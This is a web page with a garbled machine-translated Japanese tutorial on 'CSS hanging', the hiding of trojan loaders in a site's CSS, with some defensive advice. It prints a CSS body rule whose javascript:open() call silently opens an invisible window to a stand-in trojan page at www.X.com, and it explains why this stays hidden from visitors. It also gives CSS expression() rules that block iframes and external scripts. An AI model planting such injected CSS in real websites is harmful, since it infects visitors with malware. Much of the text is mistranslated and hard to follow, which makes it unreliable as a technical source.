Windows system >> Windowsの知識 >  >> Windows XPシステムチュートリアル >> XPシステムチュートリアルについて >> セキュリティチュートリアル:CSSぶら下げと防止方法を理解する(2)

セキュリティチュートリアル:CSSぶら下げと防止方法を理解する(2)

  

Xiaokeke:主にBodyオブジェクトの制御を通じて、Bodyオブジェクト要素を使用してWebドキュメント全体のコンテンツを変更しないようにすると、コンテンツまたは効果を得ることができます。 DIVオブジェクトが使用されるのと同じくらい正確に、コントロールは指定されたサイズの範囲内です。

モード2:

本文{

background-image:url(javascript:open( 'http://www.X.com/muma.htm'、 ' Newwindow '、' height = 0、width = 0、top = 1000、left = 0、toolbar = no、menuubar = no、scrollbars = no、resizable = no、location = no、status = no '))<モード1のCSSぶら下げ技術では実行時に空白のページが表示されます。これはWeb訪問者の通常のアクセスに影響するため、見つけやすくなります。ただし、モード2のこのコードではJavaScriptのOpenウィンドウを使用しているため、新しいウィンドウをバックグラウンドで静かに実行し、WebページをアクティブにしてTrojanページがオーバーフローしてもWebページの閲覧に影響はありません。したがって、それはもっと隠されています。

アンチネットワークサーバーがハングアップし、通常はウイルス対策ソフトウェアの警告が表示されます。脆弱性が絶えず更新されているため、ぶら下がっている馬の種類は常に変化しており、サーバーがハングしているかどうかを確認するのはクライアントから見過ごされがちです。正しいアプローチは、サーバーのログを頻繁にチェックし、異常な情報を見つけ、Webサイトのコードを頻繁にチェックし、そしてWeb Trojan検出システムを使用してチェックすることです。

前のブロックポップアップウィンドウを使用してCSSのぶら下がりを防止するだけでなく、WebページでCSSフィルタリングを設定してCSSをフィルタリングすることもできます。ただし、CSSのフィルタリングを選択した場合は、まず関連WebページにCSSコンテンツが含まれているかどうかに注意する必要があるため、引き続きCSSを防ぐためにブロック方法を使用します。ブロッキングコードは次のとおりです。

iframe {miao1:expression(this.src = 'about:blank'、this.outerHTML = '');}

script {miao2:expression( (this.src.indexOf( 'http')== 0)this.src = 'res://ieframe.dll/dnserror.htm');}

外部ドメインのトロイの木馬コードのsrcが重い外部ドメインのJavaScriptコードがダウンロードされないように、IE404エラーページのアドレスを書いてください。しかし、ブロッキング方式にも自然な致命的な弱点があり、その弱さの秘密は次回発表される予定です。

Copyright © Windowsの知識 All Rights Reserved